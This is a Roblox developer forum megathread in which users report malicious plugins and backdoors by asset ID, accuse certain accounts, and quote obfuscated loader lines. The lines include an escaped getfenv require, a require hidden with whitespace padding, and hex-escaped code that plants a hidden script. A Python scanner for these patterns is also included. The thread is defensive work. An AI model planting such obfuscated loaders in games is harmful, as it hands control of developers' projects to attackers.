Known Malicious Plugins for HISR detection Megathread

Can someone tell me anything about poseidon ss? I have no idea where it came from and it looks sketchy.

2 Likes

I looked into the script of the Poseidon script and I saw some usage of profanity. If this is something we all should worry about, then this script thing could be a threat to developers. Hopefully, we won't get banned for it.

I FOUND IT OUT

If you used the FE Gun Kit/Melee Kit, there’s a suspicious line in the “SimulateBulletScript”, the line is 321, with a spaced out part with a script require. I deleted this and the script GUI was removed.

This is the ID: 5770442639

And this is the account behind it all: https://www.roblox.com/users/1888346767/profile/

2 Likes

I didn’t use that model, I believe my GUI is coming from HD Admin. My friend said he was messing around and didn’t remove it. When I have access to my computer I can attempt to find the one he used.

https://www.roblox.com/users/1901570559/profile/ He uses a backup now

1 Like

That’s an openscript link, it opens the script. I’ve seen this in my game too, it would just send you to the script it originated from.

1 Like

HD Admin would not send you to something like that. The tool has only 1 require and that is for the MainModule. It could be likely that you’re using a fake HD Admin, the real one is developed by @ForeverHD.

That UI just looks bad, wonder why anyone would buy it, it’s most likely skidded as well, though, how did you get a picture of it?

False, the ID is 5712232911 as the one that you supplied requires a module that requires a module, and so on until it requires the one supplied

1 Like

I got the picture because it randomly started popping up in the game I’m developing. I couldn’t find anything about it in the explorer, as it only appeared in player gui when I ran the game. As of yesterday, it stopped appearing, no trace of it whatsoever. My only guess is that one of the other developers had a bad plugin.

1 Like

This is an amazing megathread, I’m almost positive that some Roblox Staff are going through the malicious plugins and Content Deleting them. Great work.

1 Like

Malicious: 5723263360
Original: Idk

Note: This plugin was made by the same person of some of the other malicious plugins on this thread.

Edit: I found this via the RoSync loader virus, for victims like me know what this is.

Malicious plugin: 5606261789
Original plugin: 4476041065

For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox

DuazDaio: DuazDaio - Roblox

KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.

Note: KaspersHub is also in a lot of other groups with similar logos.

I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)

Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good at covering their tracks. There are hundreds of bots.

1 Like

plugin checks for any and all scripts in the game and places multiple lines of requirements saying this
getfenv()['\114\101\113\117\105\114\101'][5151855975]

Malicious plugin: 6173331887
Original plugin: 866972013
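A scanner for two patterns reported in this thread (a `require` spelled with decimal escapes and indexed through `getfenv()`, and a `require` by asset ID pushed off-screen with whitespace), as an added example that is not code from any poster or from Roblox. It runs in Python over script source exported as text; the function names, the list of hidden names, the 40-character padding threshold and the sample script are assumptions made here.

```python
import re

# Lua string escapes: \ddd (decimal) and \xHH (hex).
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|(\d{1,3}))")
STRING = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
SMART_QUOTES = str.maketrans("\u2018\u2019\u201c\u201d", "''\"\"")  # forum pastes
HIDDEN_NAMES = {"require", "getfenv", "loadstring"}  # assumed watch list
NUMERIC_ARG = re.compile(r"[\[(]\s*(\d{6,})\s*[\])]")
PLAIN_REQUIRE = re.compile(r"\brequire\s*\(\s*(\d+)\s*\)")
PADDING = re.compile(r"\S[ \t]{40,}\S")  # code pushed off-screen (assumed threshold)


def decode_lua_escapes(text):
    """Turn \\114\\101... or \\x72\\x65... into the characters they encode."""
    return ESCAPE.sub(
        lambda m: chr(int(m.group(1), 16) if m.group(1) else int(m.group(2))), text)


def scan_source(source):
    """Return (line_number, reason, asset_id) for each suspicious line."""
    findings = []
    for number, line in enumerate(source.translate(SMART_QUOTES).splitlines(), 1):
        asset = NUMERIC_ARG.search(line)
        asset_id = int(asset.group(1)) if asset else None
        for _, body in STRING.findall(line):
            decoded = decode_lua_escapes(body)
            if decoded != body and decoded in HIDDEN_NAMES:
                findings.append((number, "escaped-" + decoded, asset_id))
        if PLAIN_REQUIRE.search(line):
            reason = "padded-require" if PADDING.search(line) else "require-by-id"
            findings.append((number, reason, asset_id))
    return findings


# Constructed sample script; only the getfenv line and the two IDs come from the thread.
SAMPLE = "\n".join([
    'local Players = game:GetService("Players")',
    'local Config = require(script.Parent.Config)',
    "getfenv()['\\114\\101\\113\\117\\105\\114\\101'][5151855975]",
    "local speed = 16" + " " * 200 + "require(5770442639)",
    'print("round started")',
])

if __name__ == "__main__":
    for finding in scan_source(SAMPLE):
        print(finding)
```

A `require-by-id` hit is not proof of a backdoor, since legitimate loaders also require a module by ID; the finding is a prompt to check who owns that asset.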

I found another malicious plugin:

Real plugin (ID:6426578337) :

Fake Plugin (ID: 6427852822):

The fake plugin contains some malicious code:

workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end

And also I found GrassFX script inside of the fake plugin:

And the code sample from the GrassFX script:

Thank you so much, this helped me out a LOT!

This is a virus: Smooth Cam - Roblox

The string is base64 for the intro of The Prince of Belair


contains bytecode interpreters

1 Like